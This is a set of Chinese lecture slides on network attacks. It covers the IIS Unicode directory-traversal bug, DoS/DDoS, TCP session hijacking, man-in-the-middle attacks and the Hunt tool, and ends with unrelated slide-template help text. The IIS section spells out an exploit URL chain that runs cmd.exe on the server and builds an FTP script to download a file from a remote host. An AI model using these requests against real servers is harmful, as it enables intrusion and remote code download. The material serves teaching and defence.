《工学网络攻击》课件

系统漏洞和后门系统漏洞是程序中无意造成的缺陷，它形成了一个不被注意的通道。漏洞也指无意的配置错误，如使用默认服务器配置。后门是一个在操作系统或程序中无证明文件的通道，通常是由软件开发人员故意放置在那里的，以便他们能够快速对产品进行支持。

IISUNICODE漏洞NSFOCUS安全小组发现IIS4.0和IIS5.0在Unicode字符解码的实现中存在一个安全漏洞，导致用户可以远程通过IIS执行任意命令。当IIS打开文件时，如果该文件名包含unicode字符，它会对其进行解码，如果用户提供一些特殊的编码，将导致IIS错误的打开或者执行某些web根目录以外的文件。IISUNICODE漏洞对于IIS5.0/4.0中文版，当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"或者"%c0%hh",它会首先将其解码变成:0xc10xhh，然后尝试打开这个文件，Windows系统认为0xc10xhh可能是unicode编码，因此它会首先将其解码，如果0x00<=%hh<0x40的话，采用的解码的格式与下面的格式类似：

%c1%hh->(0xc1-0xc0)*0x40+0xhh

%c0%hh->(0xc0-0xc0)*0x40+0xhhIISUNICODE漏洞因此，利用这种编码，我们可以构造很多字符，例如:

%c1%1c->(0xc1-0xc0)*0x40+0x1c=0x5c=‘/‘

%c0%2f->(0xc0-0xc0)*0x40+0x2f=0x2f=‘‘

攻击者可以利用这个漏洞来绕过IIS的路径检查，去执行或者打开任意的文件。

IISUNICODE漏洞如果系统包含某个可执行目录，就可能执行任意系统命令。下面的URL可能列出当前目录的内容：http://目标主机/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir利用这个漏洞查看系统文件内容也是可能的：

http://目标主机/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini

IIS漏洞/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe/scripts/ccc.exe?/c+echo+open>+getfile/scripts/ccc.exe?/c+type+getfile/scripts/ccc.exe?/c+echo+11>>+getfile/scripts/ccc.exe?/c+echo+administrator>>+getfile/scripts/ccc.exe?/c+echo+123456>>+getfile/scripts/ccc.exe?/c+echo+get+synful>>+getfile/scripts/ccc.exe?/c+echo+quit>>+getfile/scripts/ccc.exe?/c+ftp+-s:getfile拒绝服务攻击DoS（DenialofService），其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连通性攻击。拒绝服务攻击带宽攻击指以极大的通信量冲击网络，使得所有可用网络资源都被消耗殆尽，最后导致合法的用户请求就无法通过。连通性攻击指用大量的连接请求冲击计算机，使得所有可用的操作系统资源都被消耗殆尽，最终计算机无法再处理合法用户的请求

分布式拒绝服务攻击(DDoS,DistributedDenialofService)指借助于客户/服务器技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DoS攻击，从而成倍地提高拒绝服务攻击的威力。分布式拒绝服务攻击DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的，当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高时，它的效果是明显的。分布式拒绝服务攻击随着计算机与网络技术的发展，计算机的处理能力迅速增长，内存大大增加，同时也出现了千兆级别的网络，这使得DoS攻击的困难程度加大了——目标对恶意攻击包的"消化能力"加强了不少，例如你的攻击软件每秒钟可以发送3,000个攻击包，但我的主机与网络带宽每秒钟可以处理10,000个攻击包，这样一来攻击就不会产生什么效果。

分布式拒绝服务攻击高速广泛连接的网络给大家带来了方便，也为DDoS攻击创造了极为有利的条件。在低速网络时代时，黑客占领攻击用的傀儡机时，总是会优先考虑离目标网络距离近的机器，因为经过路由器的跳数少，效果好。而现在电信骨干节点之间的连接都是以G为级别的，大城市之间更可以达到2.5G的连接，这使得攻击可以从更远的地方或者其他城市发起，攻击者的傀儡机位置可以在分布在更大的范围，选择起来更灵活了。分布式拒绝服务攻击通常，攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上，在一个设定的时间主控程序将与大量代理程序通讯，代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术，主控程序能在几秒钟内激活成百上千次代理程序的运行。DDOS攻击的步骤1.搜集了解目标的情况下列情况是黑客非常关心的情报：被攻击目标主机数目、地址情况目标主机的配置、性能目标的带宽DDOS攻击的步骤2.占领傀儡机

黑客最感兴趣的是有下列情况的主机：链路状态好的主机性能好的主机安全管理水平差的主机2.占领傀儡机这一部分实际上是使用了另一大类的攻击手段：利用形攻击。这是和DDoS并列的攻击方式。简单地说，就是占领和控制被攻击的主机。取得最高的管理权限，或者至少得到一个有权限完成DDoS攻击任务的帐号。占领傀儡机对于一个DDoS攻击者来说，准备好一定数量的傀儡机是一个必要的条件，下面说一下他是如何攻击并占领它们的。占领傀儡机首先，黑客做的工作一般是扫描，随机地或者是有针对性地利用扫描器去发现互联网上那些有漏洞的机器，随后就是尝试入侵了，黑客现在占领了一台傀儡机之后，除了做留后门擦脚印这些基本工作之外，他会把DDoS攻击用的程序上载过去，一般是利用ftp。在攻击机上，会有一个DDoS的发包程序，黑客就是利用它来向受害目标发送恶意攻击包的。

DDOS攻击的步骤3.实际攻击经过精心准备之后，黑客就象图示里的那样，登录到做为控制台的傀儡机，向所有的攻击机发出命令。这时候埋伏在攻击机中的DDoS攻击程序就会响应控制台的命令，一起向受害主机以高速度发送大量的数据包，导致它死机或是无法响应正常的请求。老到的攻击者一边攻击，还会用各种手段来监视攻击的效果，在需要的时候进行一些调整。简单些就是开个窗口不断地ping目标主机，在能接到回应的时候就再加大一些流量或是再命令更多的傀儡机来加入攻击。会话劫持你Telnet到某台主机，这就是一次Telnet会话；你浏览某个网站，这就是一次HTTP会话。而会话劫持（SessionHijack），就是结合了嗅探以及欺骗技术在内的攻击手段。在一次正常的会话过程当中，攻击者作为第三方参与到其中，他可以在正常数据包中插入恶意数据，也可以在双方的会话当中进行监听，甚至可以是代替某一方主机接管会话。会话劫持原理会话劫持利用了TCP/IP工作原理来设计攻击。TCP使用端到端的连接，即（源IP，源TCP端口号，目的IP，目的TCP端号）来唯一标识每一条已经建立连接的TCP链路。另外，TCP在进行数据传输时，TCP报文首部的两个字段序号（seq）和确认序号（ackseq）非常重要。会话劫持原理序号（seq）和确认序号（ackseq）是与所携带TCP数据净荷（payload）的多少有数值上的关系：序号字段（seq）指出了本报文中传送的数据在发送主机所要传送的整个数据流中的顺序号，而确认序号字段（ackseq）指出了发送本报文的主机希望接收的对方主机中下一个八位组的顺序号。会话劫持原理因此，对于一台主机来说，其收发的两个相临TCP报文之间的序号和确认序号的关系为：它所要发出的报文中的seq值应等于它所刚收到的报文中的ackseq的值，而它所要发送报文中ackseq的值应为它所收到报文中seq的值加上该报文中所发送的TCP净荷的长度。

会话劫持原理TCP会话劫持的攻击方式可以对基于TCP的任何应用发起攻击。对于攻击者来说，所必须要做的就是窥探到正在进行TCP通信的两台主机之间传送的报文，这样攻击者就可以得知该报文的源IP、源TCP端口号、目的IP、目的TCP端号，从而可以得知其中一台主机对将要收到的下一个TCP报文段中seq和ackseq值的要求。会话劫持原理这样，在该合法主机收到另一台合法主机发送的TCP报文前，攻击者根据所截获的信息向该主机发出一个带有净荷的TCP报文，如果该主机先收到攻击报文，就可以把合法的TCP会话建立在攻击主机与被攻击主机之间。会话劫持原理带有净荷的攻击报文能够使被攻击主机对下一个要收到的TCP报文中的确认序号（ackseq）的值的要求发生变化，从而使另一台合法的主机向被攻击主机发出的报文被被攻击主机拒绝。TCP会话劫持攻击方式的好处在于使攻击者避开了被攻击主机对访问者的身份验证和安全认证，从而使攻击者直接进入对被攻击主机的的访问状态，因此对系统安全构成的威胁比较严重。会话劫持分类我们可以把会话劫持攻击分为两种类型：1）中间人攻击(ManInTheMiddle，简称MITM)，2）注射式攻击（Injection）；并且还可以把会话劫持攻击分为两种形式：1）被动劫持，2）主动劫持；被动劫持实际上就是在后台监视双方会话的数据流，从中获得敏感数据；而主动劫持则是将会话当中的某一台主机“踢”下线，然后由攻击者取代并接管会话，中间人攻击Man-in-the-MiddleAttack，（简称“MITM攻击”）是一种“间接”的入侵攻击，这种攻击模式通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间，这台计算机就称为“中间人”。中间人攻击

然后入侵者把这台计算机模拟一台或两台原始计算机，使“中间人”能够与原始计算机建立活动连接并允许其读取或修改传递的信息，然而两个原始计算机用户却认为他们是在互相通信。通常，这种“拦截数据——修改数据——发送数据”的过程就被称为“会话劫持”（SessionHijack）。注射式攻击它不会改变会话双方的通讯流，而是在双方正常的通讯流插入恶意数据。在注射式攻击中，需要实现两种技术：1）IP欺骗，2）预测TCP序列号。如果是UDP协议，只需伪造IP地址，然后发送过去就可以了，因为UDP没有所谓的TCP三次握手，但基于UDP的应用协议有流控机制，所以也要做一些额外的工作。对于IP欺骗，有两种情况需要用到：1）隐藏自己的IP地址；2）利用两台机器之间的信任关系实施入侵。huntl/w/r)list/watch/resetconnectionsl(字母l)为查看当前网络上的会话;w为监视当前网络上的某个会话;r为重置当前网络上的某个会话。hunta)arp/simplehijack(avoidsackstormifarpused)中间人攻击(会话劫持)，Hunt先进行ARP欺骗，然后进行会话劫持。使用此方法可以避免出现ACK风暴。s)simplehijack简单的会话劫持，也就是注射式攻击。会出现ACK风暴。d)daemonsrst/arp/sniff/mac该选项共实现四个功能，分别为：终止会话，自动发送带RST标志位的TCP包;ARP欺骗后进行数据包转发;嗅探功能;在当前网络上收集MAC地址。赠送精美图标1、字体安装与设置如果您对PPT模板中的字体风格不满意，可进行批量替换，一次性更改各页面字体。在“开始”选项卡中，点击“替换”按钮右侧箭头，选择“替换字体”。（如下图）在图“替换”下拉列表中选择要更改字体。（如下图）在“替换为”下拉列表中选择替换字体。点击“替换”按钮，完成。382、替换模板中的图片模板中的图片展示页面，您可以根据需要替换这些图片，下面介绍两种替换方法。方法一